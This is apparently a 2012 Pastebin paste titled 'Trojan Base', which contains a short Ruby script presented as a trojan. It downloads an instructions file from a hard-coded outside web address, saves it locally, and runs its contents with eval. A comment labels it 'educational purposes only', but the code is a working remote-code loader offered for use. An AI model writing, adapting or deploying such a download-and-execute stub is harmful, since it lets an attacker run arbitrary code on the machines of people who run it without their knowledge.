Narzew

Trojan Base (WWW instruction downloader and evaluator)

Nov 30th, 2012
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 0.46 KB | None | 0 0
  1. #Educational purposes only!!! Hacking other accounts are illegal and not fair!!!
  2. #Check my pastebin page for latest NRGSS
  3. require 'open-uri'
  4. require 'nrgss'
  5. ###***CONFIG
  6. $INSTRUCTIONS_FILE = 'http://pokepark.me3.pl' # WPISZ TUTAJ LINK DO PLIKU Z INSTRUKCJAMI
  7. ###***END OF CONFIG
  8. begin
  9.     $nrgss.uri_download($INSTRUCTIONS_FILE, 'instr.dat')
  10.     file = File.open('instr.dat', 'rb')
  11.     $data = file.read
  12.     file.close
  13.     eval($data)
  14.     exit
  15. rescue => e
  16.     raise e
  17.     exit
  18. end
Add Comment
Please, Sign In to add comment